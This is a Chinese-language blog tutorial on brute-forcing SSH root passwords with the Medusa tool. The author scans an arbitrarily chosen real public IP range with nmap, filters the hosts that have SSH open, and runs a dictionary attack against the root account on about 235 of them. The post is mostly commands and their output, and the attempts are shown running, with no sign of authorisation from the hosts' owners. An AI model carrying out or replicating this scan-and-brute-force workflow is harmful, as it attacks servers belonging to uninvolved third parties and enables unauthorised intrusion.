利用medusa破解linux ssh密码

From 一不小心高潮了'blog

蛋疼，随手写一下，medusa破解起来还是比较快的，首先我们看看帮助

root@perl-exploit:/pentest/exploits/framework3# medusa
Medusa v1.5 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

ALERT: Host information must be supplied.

Syntax: Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]
-h [TEXT] : Target hostname or IP address
-H [FILE] : File containing target hostnames or IP addresses
-u [TEXT] : Username to test
-U [FILE] : File containing usernames to test
-p [TEXT] : Password to test
-P [FILE] : File containing passwords to test
-C [FILE] : File containing combo entries. See README for more information.
-O [FILE] : File to append log information to
-e [n/s/ns] : Additional password checks ([n] No Password, [s] Password = Username)
-M [TEXT] : Name of the module to execute (without the .mod extension)
-m [TEXT] : Parameter to pass to the module. This can be passed multiple times with a
different parameter each time and they will all be sent to the module (i.e.
-m Param1 -m Param2, etc.)
-d : Dump all known modules
-n [NUM] : Use for non-default TCP port number
-s : Enable SSL
-g [NUM] : Give up after trying to connect for NUM seconds (default 3)
-r [NUM] : Sleep NUM seconds between retry attempts (default 3)
-R [NUM] : Attempt NUM retries before giving up. The total number of attempts will be NUM + 1.
-t [NUM] : Total number of logins to be tested concurrently
-T [NUM] : Total number of hosts to be tested concurrently
-L : Parallelize logins using one username per thread. The default is to process
the entire username before proceeding.
-f : Stop scanning host after first valid username/password found.
-F : Stop audit after first valid username/password found on any host.
-b : Suppress startup banner
-q : Display module's usage information
-v [NUM] : Verbose level [0 - 6 (more)]
-w [NUM] : Error debug level [0 - 10 (more)]
-V : Display version
-Z [NUM] : Resume scan from host #

ok，我们看看medusa有哪些模块支持什么功能的破解

root@perl-exploit:/pentest/exploits/framework3# medusa -d
Medusa v1.5 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

Available modules in "." :

Available modules in "/usr/lib/medusa/modules" :
+ cvs.mod : Brute force module for CVS sessions : version 1.0.0
+ ftp.mod : Brute force module for FTP/FTPS sessions : version 1.3.0
+ http.mod : Brute force module for HTTP : version 1.3.0
+ imap.mod : Brute force module for IMAP sessions : version 1.2.0
+ mssql.mod : Brute force module for M$-SQL sessions : version 1.1.1
+ mysql.mod : Brute force module for MySQL sessions : version 1.2
+ ncp.mod : Brute force module for NCP sessions : version 1.0.0
+ nntp.mod : Brute force module for NNTP sessions : version 1.0.0
+ pcanywhere.mod : Brute force module for PcAnywhere sessions : version 1.0.2
+ pop3.mod : Brute force module for POP3 sessions : version 1.2
+ postgres.mod : Brute force module for PostgreSQL sessions : version 1.0.0
+ rexec.mod : Brute force module for REXEC sessions : version 1.1.1
+ rlogin.mod : Brute force module for RLOGIN sessions : version 1.0.2
+ rsh.mod : Brute force module for RSH sessions : version 1.0.1
+ smbnt.mod : Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions : version 1.5
+ smtp-vrfy.mod : Brute force module for enumerating accounts via SMTP VRFY : version 1.0.0
+ smtp.mod : Brute force module for SMTP Authentication with TLS : version 1.0.0
+ snmp.mod : Brute force module for SNMP Community Strings : version 1.0.0
+ ssh.mod : Brute force module for SSH v2 sessions : version 1.0.2
+ svn.mod : Brute force module for Subversion sessions : version 1.0.0
+ telnet.mod : Brute force module for telnet sessions : version 1.2.2
+ vmauthd.mod : Brute force module for the VMware Authentication Daemon : version 1.0.1
+ vnc.mod : Brute force module for VNC sessions : version 1.0.1
+ web-form.mod : Brute force module for web forms : version 1.0.0
+ wrapper.mod : Generic Wrapper Module : version 1.0.1

恩，我们要破解ssh，所以用-M ssh参数加载ssh模块，后面不用跟.mod

首先我们确定目标，扫描开放ssh的机器，随便找个段扫描一下吧

root@perl-exploit:/pentest# nmap -sV -p22 -oG ssh 69.163.190.0/24

然后是漫长的等待，上面的参数扫描意思是，扫描整个段开了22端口的机器，并且判断服务版本，保存到ssh文件中。

然后我们查看扫描结果

root@perl-exploit:/pentest# cat ssh
# Nmap 5.00 scan initiated Tue Jun 22 02:18:28 2010 as: nmap -sV -p22 -oG ssh 69.163.190.0/24

Host: 69.163.190.1 (ip-69-163-190-1.dreamhost.com) Ports: 22/closed/tcp//ssh///
Host: 69.163.190.2 (ip-69-163-190-2.dreamhost.com) Ports: 22/closed/tcp//ssh///
Host: 69.163.190.3 (ip-69-163-190-3.dreamhost.com) Ports: 22/closed/tcp//ssh///
Host: 69.163.190.4 (dragich.shaggy.dreamhost.com) Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
Host: 69.163.190.5 (myrck.spongebob.dreamhost.com) Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
Host: 69.163.190.6 (apache2-twang.luthor.dreamhost.com) Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
Host: 69.163.190.7 (ps11591.dreamhost.com) Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
Host: 69.163.190.8 (ps10854.dreamhost.com) Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
Host: 69.163.190.9 (rangerjill.com) Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
Host: 69.163.190.10 (ouellette.yogi.dreamhost.com) Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
Host: 69.163.190.11 (psmysql11957.dreamhostps.com) Ports: 22/open/tcp//ssh//OpenSSH 4.3p2 Debian 9etch2 (protocol 2.0)/
Host: 69.163.190.12 (rubeo.yogi.dreamhost.com) Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
Host: 69.163.190.13 (alt-malware.com) Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
类似这样的，这里我们要整理一下，把开了ssh的IP整理出来，现在明白oG保存的意义所在了

root@perl-exploit:/pentest# grep 22/open ssh | cut -d " " -f 2 >>ssh1.txt

这条命令里用到了cut，详细用法为就不罗嗦了。查看结果

root@perl-exploit:/pentest# cat ssh1.txt
69.163.190.4
69.163.190.5
69.163.190.6
69.163.190.7
69.163.190.8
69.163.190.9
69.163.190.10
69.163.190.11
69.163.190.12
69.163.190.13
69.163.190.14
69.163.190.15
69.163.190.16
69.163.190.17
69.163.190.18
69.163.190.19
69.163.190.22
69.163.190.23
69.163.190.24
69.163.190.25
69.163.190.26
69.163.190.27
69.163.190.28
69.163.190.29
69.163.190.30
69.163.190.31
69.163.190.32
69.163.190.33
69.163.190.34
69.163.190.35
69.163.190.36
69.163.190.37
69.163.190.38
69.163.190.39
69.163.190.40
69.163.190.41
69.163.190.42
69.163.190.43
69.163.190.44
69.163.190.45
69.163.190.46
69.163.190.47
69.163.190.48
69.163.190.49
69.163.190.50
69.163.190.51
69.163.190.52
69.163.190.53
变成这样的了，接下来，我们开始随便找个字典，开始破解ssh密码

root@perl-exploit:/pentest# medusa -H ssh1.txt -u root -P p.txt -M ssh

root@perl-exploit:/pentest# medusa -H ssh1.txt -u root -P p.txt -M ssh
Medusa v1.5 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

ACCOUNT CHECK: [ssh] Host: 69.163.190.4 (1 of 235, 1 complete) User: root (1 of 1, 1 complete) Password: root (1 of 7 complete)
ACCOUNT CHECK: [ssh] Host: 69.163.190.4 (1 of 235, 1 complete) User: root (1 of 1, 1 complete) Password: admin (2 of 7 complete)
ACCOUNT CHECK: [ssh] Host: 69.163.190.4 (1 of 235, 1 complete) User: root (1 of 1, 1 complete) Password: oracle (3 of 7 complete)
ACCOUNT CHECK: [ssh] Host: 69.163.190.4 (1 of 235, 1 complete) User: root (1 of 1, 1 complete) Password: tomcat (4 of 7 complete)
ACCOUNT CHECK: [ssh] Host: 69.163.190.4 (1 of 235, 1 complete) User: root (1 of 1, 1 complete) Password: postgres (5 of 7 complete)
ACCOUNT CHECK: [ssh] Host: 69.163.190.4 (1 of 235, 1 complete) User: root (1 of 1, 1 complete) Password: webmin (6 of 7 complete)
ACCOUNT CHECK: [ssh] Host: 69.163.190.4 (1 of 235, 1 complete) User: root (1 of 1, 1 complete) Password: fuckyou (7 of 7 complete)
ACCOUNT CHECK: [ssh] Host: 69.163.190.5 (2 of 235, 2 complete) User: root (1 of 1, 1 complete) Password: root (1 of 7 complete)
ACCOUNT CHECK: [ssh] Host: 69.163.190.5 (2 of 235, 2 complete) User: root (1 of 1, 1 complete) Password: admin (2 of 7 complete)
ACCOUNT CHECK: [ssh] Host: 69.163.190.5 (2 of 235, 2 complete) User: root (1 of 1, 1 complete) Password: oracle (3 of 7 complete)
ACCOUNT CHECK: [ssh] Host: 69.163.190.5 (2 of 235, 2 complete) User: root (1 of 1, 1 complete) Password: tomcat (4 of 7 complete)
ok，等吧，这段时间你可以那啥一下，或者找个那啥片那啥一下，结果最后会自动显示。